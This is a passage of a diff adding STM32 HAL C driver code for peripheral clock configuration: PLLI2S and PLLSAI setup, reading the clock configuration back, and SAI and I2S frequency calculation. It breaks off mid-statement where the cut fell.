/*--------------------------------------------------------------------------*/ + + /*---------------------------- FMPI2C1 Configuration -----------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_FMPI2C1) == RCC_PERIPHCLK_FMPI2C1) + { + /* Check the parameters */ + assert_param(IS_RCC_FMPI2C1CLKSOURCE(PeriphClkInit->Fmpi2c1ClockSelection)); + + /* Configure the FMPI2C1 clock source */ + __HAL_RCC_FMPI2C1_CONFIG(PeriphClkInit->Fmpi2c1ClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*------------------------------ CEC Configuration -------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_CEC) == RCC_PERIPHCLK_CEC) + { + /* Check the parameters */ + assert_param(IS_RCC_CECCLKSOURCE(PeriphClkInit->CecClockSelection)); + + /* Configure the CEC clock source */ + __HAL_RCC_CEC_CONFIG(PeriphClkInit->CecClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*----------------------------- CLK48 Configuration ------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_CLK48) == RCC_PERIPHCLK_CLK48) + { + /* Check the parameters */ + assert_param(IS_RCC_CLK48CLKSOURCE(PeriphClkInit->Clk48ClockSelection)); + + /* Configure the CLK48 clock source */ + __HAL_RCC_CLK48_CONFIG(PeriphClkInit->Clk48ClockSelection); + + /* Enable the PLLSAI when it's used as clock source for CLK48 */ + if(PeriphClkInit->Clk48ClockSelection == RCC_CLK48CLKSOURCE_PLLSAIP) + { + pllsaiused = 1U; + } + } + /*--------------------------------------------------------------------------*/ + + /*----------------------------- SDIO Configuration -------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SDIO) == RCC_PERIPHCLK_SDIO) + { + /* Check the parameters */ + assert_param(IS_RCC_SDIOCLKSOURCE(PeriphClkInit->SdioClockSelection)); + + /* Configure the SDIO clock source */ + __HAL_RCC_SDIO_CONFIG(PeriphClkInit->SdioClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*------------------------------ SPDIFRX Configuration ---------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SPDIFRX) == RCC_PERIPHCLK_SPDIFRX) + { + /* Check the parameters */ + assert_param(IS_RCC_SPDIFRXCLKSOURCE(PeriphClkInit->SpdifClockSelection)); + + /* Configure the SPDIFRX clock source */ + __HAL_RCC_SPDIFRX_CONFIG(PeriphClkInit->SpdifClockSelection); + /* Enable the PLLI2S when it's used as clock source for SPDIFRX */ + if(PeriphClkInit->SpdifClockSelection == RCC_SPDIFRXCLKSOURCE_PLLI2SP) + { + plli2sused = 1U; + } + } + /*--------------------------------------------------------------------------*/ + + /*---------------------------- PLLI2S Configuration ------------------------*/ + /* PLLI2S is configured when a peripheral will use it as source clock : SAI1, SAI2, I2S on APB1, + I2S on APB2 or SPDIFRX */ + if((plli2sused == 1U) || (PeriphClkInit->PeriphClockSelection == RCC_PERIPHCLK_PLLI2S)) + { + /* Disable the PLLI2S */ + __HAL_RCC_PLLI2S_DISABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLI2S is disabled */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLI2SRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > PLLI2S_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + + /* check for common PLLI2S Parameters */ + assert_param(IS_RCC_PLLI2SM_VALUE(PeriphClkInit->PLLI2S.PLLI2SM)); + assert_param(IS_RCC_PLLI2SN_VALUE(PeriphClkInit->PLLI2S.PLLI2SN)); + + /*------ In Case of PLLI2S is selected as source clock for I2S -----------*/ + if(((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_I2S_APB1) == RCC_PERIPHCLK_I2S_APB1) && (PeriphClkInit->I2sApb1ClockSelection == RCC_I2SAPB1CLKSOURCE_PLLI2S)) || + ((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_I2S_APB2) == RCC_PERIPHCLK_I2S_APB2) && (PeriphClkInit->I2sApb2ClockSelection == RCC_I2SAPB2CLKSOURCE_PLLI2S))) + { + /* check for Parameters */ + assert_param(IS_RCC_PLLI2SR_VALUE(PeriphClkInit->PLLI2S.PLLI2SR)); + + /* Read PLLI2SP/PLLI2SQ value from PLLI2SCFGR register (this value is not needed for I2S configuration) */ + plli2sp = ((((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SP) >> RCC_PLLI2SCFGR_PLLI2SP_Pos) + 1U) << 1U); + plli2sq = ((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SQ) >> RCC_PLLI2SCFGR_PLLI2SQ_Pos); + /* Configure the PLLI2S division factors */ + /* PLLI2S_VCO = f(VCO clock) = f(PLLI2S clock input) * (PLLI2SN/PLLI2SM) */ + /* I2SCLK = f(PLLI2S clock output) = f(VCO clock) / PLLI2SR */ + __HAL_RCC_PLLI2S_CONFIG(PeriphClkInit->PLLI2S.PLLI2SM, PeriphClkInit->PLLI2S.PLLI2SN , plli2sp, plli2sq, PeriphClkInit->PLLI2S.PLLI2SR); + } + + /*------- In Case of PLLI2S is selected as source clock for SAI ----------*/ + if(((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAI1) == RCC_PERIPHCLK_SAI1) && (PeriphClkInit->Sai1ClockSelection == RCC_SAI1CLKSOURCE_PLLI2S)) || + ((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAI2) == RCC_PERIPHCLK_SAI2) && (PeriphClkInit->Sai2ClockSelection == RCC_SAI2CLKSOURCE_PLLI2S))) + { + /* Check for PLLI2S Parameters */ + assert_param(IS_RCC_PLLI2SQ_VALUE(PeriphClkInit->PLLI2S.PLLI2SQ)); + /* Check for PLLI2S/DIVQ parameters */ + assert_param(IS_RCC_PLLI2S_DIVQ_VALUE(PeriphClkInit->PLLI2SDivQ)); + + /* Read PLLI2SP/PLLI2SR value from PLLI2SCFGR register (this value is not needed for SAI configuration) */ + plli2sp = ((((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SP) >> RCC_PLLI2SCFGR_PLLI2SP_Pos) + 1U) << 1U); + plli2sr = ((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> RCC_PLLI2SCFGR_PLLI2SR_Pos); + /* Configure the PLLI2S division factors */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLI2SM */ + /* PLLI2S_VCO Output = PLLI2S_VCO Input * PLLI2SN */ + /* SAI_CLK(first level) = PLLI2S_VCO Output/PLLI2SQ */ + __HAL_RCC_PLLI2S_CONFIG(PeriphClkInit->PLLI2S.PLLI2SM, PeriphClkInit->PLLI2S.PLLI2SN , plli2sp, PeriphClkInit->PLLI2S.PLLI2SQ, plli2sr); + + /* SAI_CLK_x = SAI_CLK(first level)/PLLI2SDIVQ */ + __HAL_RCC_PLLI2S_PLLSAICLKDIVQ_CONFIG(PeriphClkInit->PLLI2SDivQ); + } + + /*------ In Case of PLLI2S is selected as source clock for SPDIFRX -------*/ + if((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SPDIFRX) == RCC_PERIPHCLK_SPDIFRX) && (PeriphClkInit->SpdifClockSelection == RCC_SPDIFRXCLKSOURCE_PLLI2SP)) + { + /* check for Parameters */ + assert_param(IS_RCC_PLLI2SP_VALUE(PeriphClkInit->PLLI2S.PLLI2SP)); + /* Read PLLI2SR value from PLLI2SCFGR register (this value is not need for SAI configuration) */ + plli2sq = ((((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SP) >> RCC_PLLI2SCFGR_PLLI2SP_Pos) + 1U) << 1U); + plli2sr = ((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> RCC_PLLI2SCFGR_PLLI2SR_Pos); + /* Configure the PLLI2S division factors */ + /* PLLI2S_VCO = f(VCO clock) = f(PLLI2S clock input) * (PLLI2SN/PLLI2SM) */ + /* SPDIFRXCLK = f(PLLI2S clock output) = f(VCO clock) / PLLI2SP */ + __HAL_RCC_PLLI2S_CONFIG(PeriphClkInit->PLLI2S.PLLI2SM, PeriphClkInit->PLLI2S.PLLI2SN , PeriphClkInit->PLLI2S.PLLI2SP, plli2sq, plli2sr); + } + + /*----------------- In Case of PLLI2S is just selected -----------------*/ + if((PeriphClkInit->PeriphClockSelection & RCC_PERIPHCLK_PLLI2S) == RCC_PERIPHCLK_PLLI2S) + { + /* Check for Parameters */ + assert_param(IS_RCC_PLLI2SP_VALUE(PeriphClkInit->PLLI2S.PLLI2SP)); + assert_param(IS_RCC_PLLI2SR_VALUE(PeriphClkInit->PLLI2S.PLLI2SR)); + assert_param(IS_RCC_PLLI2SQ_VALUE(PeriphClkInit->PLLI2S.PLLI2SQ)); + + /* Configure the PLLI2S division factors */ + /* PLLI2S_VCO = f(VCO clock) = f(PLLI2S clock input) * (PLLI2SN/PLLI2SM) */ + __HAL_RCC_PLLI2S_CONFIG(PeriphClkInit->PLLI2S.PLLI2SM, PeriphClkInit->PLLI2S.PLLI2SN , PeriphClkInit->PLLI2S.PLLI2SP, PeriphClkInit->PLLI2S.PLLI2SQ, PeriphClkInit->PLLI2S.PLLI2SR); + } + + /* Enable the PLLI2S */ + __HAL_RCC_PLLI2S_ENABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLI2S is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLI2SRDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > PLLI2S_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + } + /*--------------------------------------------------------------------------*/ + + /*----------------------------- PLLSAI Configuration -----------------------*/ + /* PLLSAI is configured when a peripheral will use it as source clock : SAI1, SAI2, CLK48 or SDIO */ + if(pllsaiused == 1U) + { + /* Disable PLLSAI Clock */ + __HAL_RCC_PLLSAI_DISABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLSAI is disabled */ + while(__HAL_RCC_PLLSAI_GET_FLAG() != RESET) + { + if((HAL_GetTick() - tickstart ) > PLLSAI_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + + /* Check the PLLSAI division factors */ + assert_param(IS_RCC_PLLSAIM_VALUE(PeriphClkInit->PLLSAI.PLLSAIM)); + assert_param(IS_RCC_PLLSAIN_VALUE(PeriphClkInit->PLLSAI.PLLSAIN)); + + /*------ In Case of PLLSAI is selected as source clock for SAI -----------*/ + if(((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAI1) == RCC_PERIPHCLK_SAI1) && (PeriphClkInit->Sai1ClockSelection == RCC_SAI1CLKSOURCE_PLLSAI)) || + ((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAI2) == RCC_PERIPHCLK_SAI2) && (PeriphClkInit->Sai2ClockSelection == RCC_SAI2CLKSOURCE_PLLSAI))) + { + /* check for PLLSAIQ Parameter */ + assert_param(IS_RCC_PLLSAIQ_VALUE(PeriphClkInit->PLLSAI.PLLSAIQ)); + /* check for PLLSAI/DIVQ Parameter */ + assert_param(IS_RCC_PLLSAI_DIVQ_VALUE(PeriphClkInit->PLLSAIDivQ)); + + /* Read PLLSAIP value from PLLSAICFGR register (this value is not needed for SAI configuration) */ + pllsaip = ((((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIP) >> RCC_PLLSAICFGR_PLLSAIP_Pos) + 1U) << 1U); + /* PLLSAI_VCO Input = PLL_SOURCE/PLLM */ + /* PLLSAI_VCO Output = PLLSAI_VCO Input * PLLSAIN */ + /* SAI_CLK(first level) = PLLSAI_VCO Output/PLLSAIQ */ + __HAL_RCC_PLLSAI_CONFIG(PeriphClkInit->PLLSAI.PLLSAIM, PeriphClkInit->PLLSAI.PLLSAIN , pllsaip, PeriphClkInit->PLLSAI.PLLSAIQ, 0U); + + /* SAI_CLK_x = SAI_CLK(first level)/PLLSAIDIVQ */ + __HAL_RCC_PLLSAI_PLLSAICLKDIVQ_CONFIG(PeriphClkInit->PLLSAIDivQ); + } + + /*------ In Case of PLLSAI is selected as source clock for CLK48 ---------*/ + /* In Case of PLLI2S is selected as source clock for CLK48 */ + if((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_CLK48) == RCC_PERIPHCLK_CLK48) && (PeriphClkInit->Clk48ClockSelection == RCC_CLK48CLKSOURCE_PLLSAIP)) + { + /* check for Parameters */ + assert_param(IS_RCC_PLLSAIP_VALUE(PeriphClkInit->PLLSAI.PLLSAIP)); + /* Read PLLSAIQ value from PLLI2SCFGR register (this value is not need for SAI configuration) */ + pllsaiq = ((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIQ) >> RCC_PLLSAICFGR_PLLSAIQ_Pos); + /* Configure the PLLSAI division factors */ + /* PLLSAI_VCO = f(VCO clock) = f(PLLSAI clock input) * (PLLI2SN/PLLSAIM) */ + /* 48CLK = f(PLLSAI clock output) = f(VCO clock) / PLLSAIP */ + __HAL_RCC_PLLSAI_CONFIG(PeriphClkInit->PLLSAI.PLLSAIM, PeriphClkInit->PLLSAI.PLLSAIN , PeriphClkInit->PLLSAI.PLLSAIP, pllsaiq, 0U); + } + + /* Enable PLLSAI Clock */ + __HAL_RCC_PLLSAI_ENABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLSAI is ready */ + while(__HAL_RCC_PLLSAI_GET_FLAG() == RESET) + { + if((HAL_GetTick() - tickstart ) > PLLSAI_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + } + return HAL_OK; +} + +/** + * @brief Get the RCC_PeriphCLKInitTypeDef according to the internal + * RCC configuration registers. + * @param PeriphClkInit pointer to an RCC_PeriphCLKInitTypeDef structure that + * will be configured. + * @retval None + */ +void HAL_RCCEx_GetPeriphCLKConfig(RCC_PeriphCLKInitTypeDef *PeriphClkInit) +{ + uint32_t tempreg; + + /* Set all possible values for the extended clock type parameter------------*/ + PeriphClkInit->PeriphClockSelection = RCC_PERIPHCLK_I2S_APB1 | RCC_PERIPHCLK_I2S_APB2 |\ + RCC_PERIPHCLK_SAI1 | RCC_PERIPHCLK_SAI2 |\ + RCC_PERIPHCLK_TIM | RCC_PERIPHCLK_RTC |\ + RCC_PERIPHCLK_CEC | RCC_PERIPHCLK_FMPI2C1 |\ + RCC_PERIPHCLK_CLK48 | RCC_PERIPHCLK_SDIO |\ + RCC_PERIPHCLK_SPDIFRX; + + /* Get the PLLI2S Clock configuration --------------------------------------*/ + PeriphClkInit->PLLI2S.PLLI2SM = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM) >> RCC_PLLI2SCFGR_PLLI2SM_Pos); + PeriphClkInit->PLLI2S.PLLI2SN = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> RCC_PLLI2SCFGR_PLLI2SN_Pos); + PeriphClkInit->PLLI2S.PLLI2SP = (uint32_t)((((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SP) >> RCC_PLLI2SCFGR_PLLI2SP_Pos) + 1U) << 1U); + PeriphClkInit->PLLI2S.PLLI2SQ = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SQ) >> RCC_PLLI2SCFGR_PLLI2SQ_Pos); + PeriphClkInit->PLLI2S.PLLI2SR = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> RCC_PLLI2SCFGR_PLLI2SR_Pos); + /* Get the PLLSAI Clock configuration --------------------------------------*/ + PeriphClkInit->PLLSAI.PLLSAIM = (uint32_t)((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIM) >> RCC_PLLSAICFGR_PLLSAIM_Pos); + PeriphClkInit->PLLSAI.PLLSAIN = (uint32_t)((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIN) >> RCC_PLLSAICFGR_PLLSAIN_Pos); + PeriphClkInit->PLLSAI.PLLSAIP = (uint32_t)((((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIP) >> RCC_PLLSAICFGR_PLLSAIP_Pos) + 1U) << 1U); + PeriphClkInit->PLLSAI.PLLSAIQ = (uint32_t)((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIQ) >> RCC_PLLSAICFGR_PLLSAIQ_Pos); + /* Get the PLLSAI/PLLI2S division factors ----------------------------------*/ + PeriphClkInit->PLLI2SDivQ = (uint32_t)((RCC->DCKCFGR & RCC_DCKCFGR_PLLI2SDIVQ) >> RCC_DCKCFGR_PLLI2SDIVQ_Pos); + PeriphClkInit->PLLSAIDivQ = (uint32_t)((RCC->DCKCFGR & RCC_DCKCFGR_PLLSAIDIVQ) >> RCC_DCKCFGR_PLLSAIDIVQ_Pos); + + /* Get the SAI1 clock configuration ----------------------------------------*/ + PeriphClkInit->Sai1ClockSelection = __HAL_RCC_GET_SAI1_SOURCE(); + + /* Get the SAI2 clock configuration ----------------------------------------*/ + PeriphClkInit->Sai2ClockSelection = __HAL_RCC_GET_SAI2_SOURCE(); + + /* Get the I2S APB1 clock configuration ------------------------------------*/ + PeriphClkInit->I2sApb1ClockSelection = __HAL_RCC_GET_I2S_APB1_SOURCE(); + + /* Get the I2S APB2 clock configuration ------------------------------------*/ + PeriphClkInit->I2sApb2ClockSelection = __HAL_RCC_GET_I2S_APB2_SOURCE(); + + /* Get the RTC Clock configuration -----------------------------------------*/ + tempreg = (RCC->CFGR & RCC_CFGR_RTCPRE); + PeriphClkInit->RTCClockSelection = (uint32_t)((tempreg) | (RCC->BDCR & RCC_BDCR_RTCSEL)); + + /* Get the CEC clock configuration -----------------------------------------*/ + PeriphClkInit->CecClockSelection = __HAL_RCC_GET_CEC_SOURCE(); + + /* Get the FMPI2C1 clock configuration -------------------------------------*/ + PeriphClkInit->Fmpi2c1ClockSelection = __HAL_RCC_GET_FMPI2C1_SOURCE(); + + /* Get the CLK48 clock configuration ----------------------------------------*/ + PeriphClkInit->Clk48ClockSelection = __HAL_RCC_GET_CLK48_SOURCE(); + + /* Get the SDIO clock configuration ----------------------------------------*/ + PeriphClkInit->SdioClockSelection = __HAL_RCC_GET_SDIO_SOURCE(); + + /* Get the SPDIFRX clock configuration -------------------------------------*/ + PeriphClkInit->SpdifClockSelection = __HAL_RCC_GET_SPDIFRX_SOURCE(); + + /* Get the TIM Prescaler configuration -------------------------------------*/ + if ((RCC->DCKCFGR & RCC_DCKCFGR_TIMPRE) == RESET) + { + PeriphClkInit->TIMPresSelection = RCC_TIMPRES_DESACTIVATED; + } + else + { + PeriphClkInit->TIMPresSelection = RCC_TIMPRES_ACTIVATED; + } +} + +/** + * @brief Return the peripheral clock frequency for a given peripheral(SAI..) + * @note Return 0 if peripheral clock identifier not managed by this API + * @param PeriphClk Peripheral clock identifier + * This parameter can be one of the following values: + * @arg RCC_PERIPHCLK_SAI1: SAI1 peripheral clock + * @arg RCC_PERIPHCLK_SAI2: SAI2 peripheral clock + * @arg RCC_PERIPHCLK_I2S_APB1: I2S APB1 peripheral clock + * @arg RCC_PERIPHCLK_I2S_APB2: I2S APB2 peripheral clock + * @retval Frequency in KHz + */ +uint32_t HAL_RCCEx_GetPeriphCLKFreq(uint32_t PeriphClk) +{ + uint32_t tmpreg1 = 0U; + /* This variable used to store the SAI clock frequency (value in Hz) */ + uint32_t frequency = 0U; + /* This variable used to store the VCO Input (value in Hz) */ + uint32_t vcoinput = 0U; + /* This variable used to store the SAI clock source */ + uint32_t saiclocksource = 0U; + uint32_t srcclk = 0U; + /* This variable used to store the VCO Output (value in Hz) */ + uint32_t vcooutput = 0U; + switch (PeriphClk) + { + case RCC_PERIPHCLK_SAI1: + case RCC_PERIPHCLK_SAI2: + { + saiclocksource = RCC->DCKCFGR; + saiclocksource &= (RCC_DCKCFGR_SAI1SRC | RCC_DCKCFGR_SAI2SRC); + switch (saiclocksource) + { + case 0U: /* PLLSAI is the clock source for SAI*/ + { + /* Configure the PLLSAI division factor */ + /* PLLSAI_VCO Input = PLL_SOURCE/PLLSAIM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSI) + { + /* In Case the PLL Source is HSI (Internal Clock) */ + vcoinput = (HSI_VALUE / (uint32_t)(RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIM)); + } + else + { + /* In Case the PLL Source is HSE (External Clock) */ + vcoinput = ((HSE_VALUE / (uint32_t)(RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIM))); + } + /* PLLSAI_VCO Output = PLLSAI_VCO Input * PLLSAIN */ + /* SAI_CLK(first level) = PLLSAI_VCO Output/PLLSAIQ */ + tmpreg1 = (RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIQ) >> 24U; + frequency = (vcoinput * ((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIN) >> 6U))/(tmpreg1); + + /* SAI_CLK_x = SAI_CLK(first level)/PLLSAIDIVQ */ + tmpreg1 = (((RCC->DCKCFGR & RCC_DCKCFGR_PLLSAIDIVQ) >> 8U) + 1U); + frequency = frequency/(tmpreg1); + break; + } + case RCC_DCKCFGR_SAI1SRC_0: /* PLLI2S is the clock source for SAI*/ + case RCC_DCKCFGR_SAI2SRC_0: /* PLLI2S is the clock source for SAI*/ + { + /* Configure the PLLI2S division factor */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLI2SM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSI) + { + /* In Case the PLL Source is HSI (Internal Clock) */ + vcoinput = (HSI_VALUE / (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM)); + } + else + { + /* In Case the PLL Source is HSE (External Clock) */ + vcoinput = ((HSE_VALUE / (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM))); + } + + /* PLLI2S_VCO Output = PLLI2S_VCO Input * PLLI2SN */ + /* SAI_CLK(first level) = PLLI2S_VCO Output/PLLI2SQ */ + tmpreg1 = (RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SQ) >> 24U; + frequency = (vcoinput * ((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> 6U))/(tmpreg1); + + /* SAI_CLK_x = SAI_CLK(first level)/PLLI2SDIVQ */ + tmpreg1 = ((RCC->DCKCFGR & RCC_DCKCFGR_PLLI2SDIVQ) + 1U); + frequency = frequency/(tmpreg1); + break; + } + case RCC_DCKCFGR_SAI1SRC_1: /* PLLR is the clock source for SAI*/ + case RCC_DCKCFGR_SAI2SRC_1: /* PLLR is the clock source for SAI*/ + { + /* Configure the PLLI2S division factor */ + /* PLL_VCO Input = PLL_SOURCE/PLLM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSI) + { + /* In Case the PLL Source is HSI (Internal Clock) */ + vcoinput = (HSI_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + else + { + /* In Case the PLL Source is HSE (External Clock) */ + vcoinput = ((HSE_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM))); + } + + /* PLL_VCO Output = PLL_VCO Input * PLLN */ + /* SAI_CLK_x = PLL_VCO Output/PLLR */ + tmpreg1 = (RCC->PLLCFGR & RCC_PLLCFGR_PLLR) >> 28U; + frequency = (vcoinput * ((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> 6U))/(tmpreg1); + break; + } + case RCC_DCKCFGR_SAI1SRC: /* External clock is the clock source for SAI*/ + { + frequency = EXTERNAL_CLOCK_VALUE; + break; + } + case RCC_DCKCFGR_SAI2SRC: /* PLLSRC(HSE or HSI) is the clock source for SAI*/ + { + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSI) + { + /* In Case the PLL Source is HSI (Internal Clock) */ + frequency = (uint32_t)(HSI_VALUE); + } + else + { + /* In Case the PLL Source is HSE (External Clock) */ + frequency = (uint32_t)(HSE_VALUE); + } + break; + } + default : + { + break; + } + } + break; + } + case RCC_PERIPHCLK_I2S_APB1: + { + /* Get the current I2S source */ + srcclk = __HAL_RCC_GET_I2S_APB1_SOURCE(); + switch (srcclk) + { + /* Check if I2S clock selection is External clock mapped on the I2S_CKIN pin used as I2S clock */ + case RCC_I2SAPB1CLKSOURCE_EXT: + { + /* Set the I2S clock to the external clock value */ + frequency = EXTERNAL_CLOCK_VALUE; + break; + } + /* Check if I2S clock selection is PLLI2S VCO output clock divided by PLLI2SR used as I2S clock */ + case RCC_I2SAPB1CLKSOURCE_PLLI2S: + { + /* Configure the PLLI2S division factor */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLI2SM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSE_VALUE / (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM)); + } + else + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSI_VALUE / (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM)); + } + + /* PLLI2S_VCO Output = PLLI2S_VCO Input * PLLI2SN */ + vcooutput = (uint32_t)(vcoinput * (((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> 6U) & (RCC_PLLI2SCFGR_PLLI2SN >> 6U))); + /* I2S_CLK = PLLI2S_VCO Output/PLLI2SR */ + frequency = (uint32_t)(vcooutput /(((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> 28U) & (RCC_PLLI2SCFGR_PLLI2SR >> 28U))); + break; + } + /* Check if I2S clock selection is PLL VCO Output divided by PLLR used as I2S clock */ + case RCC_I2SAPB1CLKSOURCE_PLLR: + { + /* Configure the PLL division factor R */ + /* PLL_VCO Input = PLL_SOURCE/PLLM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSE_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + else + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSI_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + + /* PLL_VCO Output = PLL_VCO Input * PLLN */ + vcooutput = (uint32_t)(vcoinput * (((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> 6U) & (RCC_PLLCFGR_PLLN >> 6U))); + /* I2S_CLK = PLL_VCO Output/PLLR */ + frequency = (uint32_t)(vcooutput /(((RCC->PLLCFGR & RCC_PLLCFGR_PLLR) >> 28U) & (RCC_PLLCFGR_PLLR >> 28U))); + break; + } + /* Check if I2S clock selection is HSI or HSE depending from PLL source Clock */ + case RCC_I2SAPB1CLKSOURCE_PLLSRC: + { + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + frequency = HSE_VALUE; + } + else + { + frequency = HSI_VALUE; + } + break; + } + /* Clock not enabled for I2S*/ + default: + { + frequency = 0U; + break; + } + } + break; + } + case RCC_PERIPHCLK_I2S_APB2: + { + /* Get the current I2S source */ + srcclk = __HAL_RCC_GET_I2S_APB2_SOURCE(); + switch (srcclk) + { + /* Check if I2S clock selection is External clock mapped on the I2S_CKIN pin used as I2S clock */ + case RCC_I2SAPB2CLKSOURCE_EXT: + { + /* Set the I2S clock to the external clock value */ + frequency = EXTERNAL_CLOCK_VALUE; + break; + } + /* Check if I2S clock selection is PLLI2S VCO output clock divided by PLLI2SR used as I2S clock */ + case RCC_I2SAPB2CLKSOURCE_PLLI2S: + { + /* Configure the PLLI2S division factor */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLI2SM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSE_VALUE / (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM)); + } + else + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSI_VALUE / (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM)); + } + + /* PLLI2S_VCO Output = PLLI2S_VCO Input * PLLI2SN */ + vcooutput = (uint32_t)(vcoinput * (((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> 6U) & (RCC_PLLI2SCFGR_PLLI2SN >> 6U))); + /* I2S_CLK = PLLI2S_VCO Output/PLLI2SR */ + frequency = (uint32_t)(vcooutput /(((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> 28U) & (RCC_PLLI2SCFGR_PLLI2SR >> 28U))); + break; + } + /* Check if I2S clock selection is PLL VCO Output divided by PLLR used as I2S clock */ + case RCC_I2SAPB2CLKSOURCE_PLLR: + { + /* Configure the PLL division factor R */ + /* PLL_VCO Input = PLL_SOURCE/PLLM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSE_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + else + { + /* Get the I2S source clock value */ + vcoinput = 